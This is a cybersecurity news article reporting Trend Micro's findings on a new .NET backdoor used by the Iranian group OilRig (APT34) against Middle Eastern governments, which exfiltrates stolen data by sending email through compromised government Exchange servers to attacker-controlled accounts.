The Iranian nation-state hacking group known as OilRig has continued to target government organizations in the Middle East as part of a cyber espionage campaign that leverages a new backdoor to exfiltrate data.
"The campaign abuses legitimate but compromised email accounts to send stolen data to external mail accounts controlled by the attackers," Trend Micro researchers Mohamed Fahmy, Sherif

Cyber Espionage / Cyber Threat

The Iranian nation-state hacking group known as **OilRig** has continued to target government organizations in the Middle East as part of a cyber espionage campaign that leverages a new backdoor to exfiltrate data.

"The campaign abuses legitimate but compromised email accounts to send stolen data to external mail accounts controlled by the attackers," Trend Micro researchers Mohamed Fahmy, Sherif Magdy, and Mahmoud Zohdy said.

While the technique in itself is not unheard of, the development marks the first time OilRig has adopted it in its playbook, indicating the continued evolution of its methods to bypass security protections.

The advanced persistent threat (APT) group, also referred to as APT34, Cobalt Gypsy, Europium, and Helix Kitten, has been documented for its targeted phishing attacks in the Middle East since at least 2014.

Linked to Iran's Ministry of Intelligence and Security (MOIS), the group is known to use a diverse toolset in its operations, with recent attacks in 2021 and 2022 employing backdoors such as Karkoff, Shark, Marlin, and Saitama for information theft.

The starting point of the latest activity is a .NET-based dropper that's tasked with delivering four different files, including the main implant ("DevicesSrv.exe") responsible for exfiltrating specific files of interest.

Also put to use in the second stage is a dynamic-link library (DLL) file that's capable of harvesting credentials from domain users and local accounts.

The most notable aspect of the .NET backdoor is its exfiltration routine, which involves using the stolen credentials to send electronic missives to actor-controlled email Gmail and Proton Mail addresses.

"The threat actors relay these emails via government Exchange Servers using vaild accounts with stolen passwords," the researchers said.

The campaign's connections to APT34 stems from similarities in between the first-stage dropper and Saitama, the victimology patterns, and the use of internet-facing exchange servers as a communication method, as observed in the case of Karkoff.

If anything, the growing number of malicious tools associated with OilRig indicates the threat actor's "flexibility" to come up with new malware based on the targeted environments and the privileges possessed at a given stage of the attack.

"Despite the routine's simplicity, the novelty of the second and last stages also indicate that this entire routine can just be a small part of a bigger campaign targeting governments," the researchers said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#backdoor